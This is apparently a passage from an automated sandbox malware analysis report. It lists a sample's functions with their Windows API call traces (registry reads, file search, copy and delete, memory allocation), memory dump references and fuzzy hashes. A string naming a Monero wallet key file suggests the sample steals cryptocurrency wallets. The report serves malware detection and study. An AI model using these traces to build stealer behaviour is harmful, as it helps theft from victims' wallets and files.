Part of subcall function 003B8D90: GetFileAttributesA.KERNEL32(00000000,?,003A1B54,?,?,003C564C,?,?,003C0E1F), ref: 003B8D9F

Part of subcall function 003B4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003B4580
Part of subcall function 003B4570: RtlAllocateHeap.NTDLL(00000000), ref: 003B4587
Part of subcall function 003B4570: wsprintfA.USER32 ref: 003B45A6
Part of subcall function 003B4570: FindFirstFileA.KERNEL32(?,?), ref: 003B45BD

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: c003de9ac45497e029ccbfb3b0d45f41499839cca816d704de4f9e5c59b8b95e
Instruction ID: f3f3881524f85c7ce3a820827974b32eabc433f1d5cd7461ea6ee5f861305d46
Opcode Fuzzy Hash: c003de9ac45497e029ccbfb3b0d45f41499839cca816d704de4f9e5c59b8b95e
Instruction Fuzzy Hash: 483172B6900208A7DB16FBB0DCC5EED737CAB58704F404589B359AA081EF74A78DCB95

Function 003B40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00F3D510,00000000,00020119,?), ref: 003B40F4
RegQueryValueExA.ADVAPI32(?,00F3EC60,00000000,00000000,00000000,000000FF), ref: 003B4118
RegCloseKey.ADVAPI32(?), ref: 003B4122
lstrcat.KERNEL32(?,00000000), ref: 003B4147
lstrcat.KERNEL32(?,00F3ED20), ref: 003B415B

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue
String ID:
API String ID: 690832082-0
Opcode ID: 27015f403f1e4539de2b316128b2f190d41c642711ceaae85a5c776cf0761cfc
Instruction ID: 30abddfb9a588b134e0bb529614b6ad1bc8f4a964284e94279f9971f706c60b7
Opcode Fuzzy Hash: 27015f403f1e4539de2b316128b2f190d41c642711ceaae85a5c776cf0761cfc
Instruction Fuzzy Hash: 9C41B9B7D001086BDB19EBB0DC86FEE737DAB98300F004558B7555E181EA75AB8C8B92

Function 6CCAC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6CCAC947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CCAC969
GetSystemInfo.KERNEL32(?), ref: 6CCAC9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CCAC9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CCAC9E2

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 3a7c0c3562e571061ec9c6faba7dce015b233afdc69e4bfed631bcffd34f5a3a
Instruction ID: 379bb66b026963ac6ac76b5839a5ec16cbaa1b430ecbffb78db944eec24832cf
Opcode Fuzzy Hash: 3a7c0c3562e571061ec9c6faba7dce015b233afdc69e4bfed631bcffd34f5a3a
Instruction Fuzzy Hash: 3A21F5717012056BEB04AAB8D889BAE72BDFB46300F50011AFA07A7F80EB3198068795

Function 003B7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B7E37
RtlAllocateHeap.NTDLL(00000000), ref: 003B7E3E
RegOpenKeyExA.KERNEL32(80000002,00F2B8D0,00000000,00020119,?), ref: 003B7E5E
RegQueryValueExA.KERNEL32(?,00F3D2B0,00000000,00000000,000000FF,000000FF), ref: 003B7E7F
RegCloseKey.ADVAPI32(?), ref: 003B7E92

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 8e4f29b3889bee7f4793a3ad83261a3d793b049c60abf703c72b3fe8e9ac0bef
Instruction ID: c3dbdd820340650ba914e8ae771ba0abe541837cc93f36f82dde8a6c80b4cd12
Opcode Fuzzy Hash: 8e4f29b3889bee7f4793a3ad83261a3d793b049c60abf703c72b3fe8e9ac0bef
Instruction Fuzzy Hash: 90119EB1A44245EBDB08CFA4DC89FBBBBBCEB44B04F104119F705AB680D77468049BA2

Function 003A12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 003A12B4
RtlAllocateHeap.NTDLL(00000000), ref: 003A12BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 003A12D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003A12F5
RegCloseKey.ADVAPI32(?), ref: 003A12FF

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 7b6ab36968e327301ce8d62ed09fda180ba3cf4bd5b0a95460f3e62223a70e5e
Instruction ID: e8ac72c153325b2e132def2cf2fa28f01e71489332a1f47f30ab4a74a4237a0c
Opcode Fuzzy Hash: 7b6ab36968e327301ce8d62ed09fda180ba3cf4bd5b0a95460f3e62223a70e5e
Instruction Fuzzy Hash: 1C0144B9A40208BFDB04DFE0DC89FAEB7BCEB48701F008159FA45DB280D670AA059F51

Function 003AA0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(00F38688,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 003AA0BD
LoadLibraryA.KERNEL32(00F3D2F0), ref: 003AA146

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Part of subcall function 003BA820: lstrlen.KERNEL32(003A4F05,?,?,003A4F05,003C0DDE), ref: 003BA82B
Part of subcall function 003BA820: lstrcpy.KERNEL32(003C0DDE,00000000), ref: 003BA885

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA920: lstrcpy.KERNEL32(00000000,?), ref: 003BA972
Part of subcall function 003BA920: lstrcat.KERNEL32(00000000), ref: 003BA982

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

SetEnvironmentVariableA.KERNEL32(00F38688,00000000,00000000,?,003C12D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,003C0AFE), ref: 003AA132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 003AA0B2, 003AA0C6, 003AA0DC

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-1435860445
Opcode ID: bc799874bc561db0fa83254ea0ee8f5d4e1e145bd790e4edfd43ea3200a1cfd5
Instruction ID: f1089d57c3d0b92ac4d1ae9b64c9521e6d43b2ab9a189974b765e2e6b911a222
Opcode Fuzzy Hash: bc799874bc561db0fa83254ea0ee8f5d4e1e145bd790e4edfd43ea3200a1cfd5
Instruction Fuzzy Hash: 19415FB1C01644AFCB0ADFB4ECD5BAA37B4FB2A305F150418F5459B2A0DB346949EB63

Function 003AA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

Part of subcall function 003B8B60: GetSystemTime.KERNEL32(003C0E1A,00F3CC78,003C05AE,?,?,003A13F9,?,0000001A,003C0E1A,00000000,?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003B8B86

Part of subcall function 003BA920: lstrcpy.KERNEL32(00000000,?), ref: 003BA972
Part of subcall function 003BA920: lstrcat.KERNEL32(00000000), ref: 003BA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003AA2E1
lstrlen.KERNEL32(00000000,00000000), ref: 003AA3FF
lstrlen.KERNEL32(00000000), ref: 003AA6BC

Part of subcall function 003BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003BA7E6

DeleteFileA.KERNEL32(00000000), ref: 003AA743

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: d681b66388da9e18ce7d775d5baa5fc634e6ce2f586b0afc34ce832e2f358b1c
Instruction ID: 6c14553181ccd4f99eb5c3dd4d7aa63e575af6cbf70519a88ac647e802304a58
Opcode Fuzzy Hash: d681b66388da9e18ce7d775d5baa5fc634e6ce2f586b0afc34ce832e2f358b1c
Instruction Fuzzy Hash: 5AE11772C10908ABDB16FBA4DC91EEE7738AF14304F508159F616BA891DF306A4DDB72

Function 003AD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

Part of subcall function 003B8B60: GetSystemTime.KERNEL32(003C0E1A,00F3CC78,003C05AE,?,?,003A13F9,?,0000001A,003C0E1A,00000000,?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003B8B86

Part of subcall function 003BA920: lstrcpy.KERNEL32(00000000,?), ref: 003BA972
Part of subcall function 003BA920: lstrcat.KERNEL32(00000000), ref: 003BA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003AD801
lstrlen.KERNEL32(00000000), ref: 003AD99F
lstrlen.KERNEL32(00000000), ref: 003AD9B3
DeleteFileA.KERNEL32(00000000), ref: 003ADA32

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
